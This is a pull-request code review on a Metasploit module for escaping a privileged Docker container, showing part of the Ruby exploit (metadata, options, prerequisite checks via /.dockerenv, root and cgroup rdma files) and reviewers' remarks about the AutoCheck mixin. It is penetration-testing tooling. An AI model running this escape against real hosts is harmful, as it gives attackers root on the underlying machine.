modules/exploits/linux/local/docker_privileged_container_escape.rb

```diff
@@ -0,0 +1,159 @@
+            },
+                'License' => MSF_LICENSE,
+                'Author' => ['stealthcopter'],
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+                'Targets' => [['Automatic', {}]],
+                'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
+                'SessionTypes' => ['shell', 'meterpreter'],
+                'DefaultTarget' => 0,
+                'References' => [
+                    ['EDB', '47147'],
+                    ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+                    ['URL', 'https://github.com/stealthcopter/deepce']
+                ],
+                'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+            }
+        )
+    )
+    register_advanced_options(
+        [
+            OptBool.new('ForceExploit', [false, 'Override check result', false]),
+            OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
+            OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
+            OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
+        ]
+    )
+  end
+
+  def base_dir_container
+    datastore['WritableContainerDir'].to_s
+  end
+
+  def base_dir_host
+    datastore['WritableHostDir'].to_s
+  end
+
+  # Get the container id and check it's the expected 64 char hex string, otherwise return nil
+  def container_id
+    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
+      return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
+    end
+
+    # is root user
+    unless is_root?
+      return Exploit::CheckCode::Safe('Exploit requires root inside container')
+    end
+
+    # are rdma files present in /sys/
+    path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1')
+    unless path.start_with? '/'
+      return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.')
+    end
+
+    Exploit::CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
```

Comment:
The `AutoCheck` mixin can take care of this automatically. All you would need to do is add `prepend Msf::Exploit::Remote::AutoCheck` at the start of the module (before the `include` lines) and you'll get automagic checking for free. If the operator wants to bypass the AutoCheck and proceed with exploitation even when the check fails, they can `set ForceExploit true`. The `ForceExploit` module option should also be removed, as this is provided automatically by `AutoCheck`.

```suggestion
```

Reply:
@bcoles ah this is good to know, thanks! I had copied it from a similar module: [docker_daemon_privilege_escalation.rb](https://github.com/rapid7/metasploit-framework/blob/016e2bdf155560805e86d56e50da2a0bf7e06199/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb#L53)

Reply:
The `AutoCheck` mixin is new.

Reply:
cool, will update now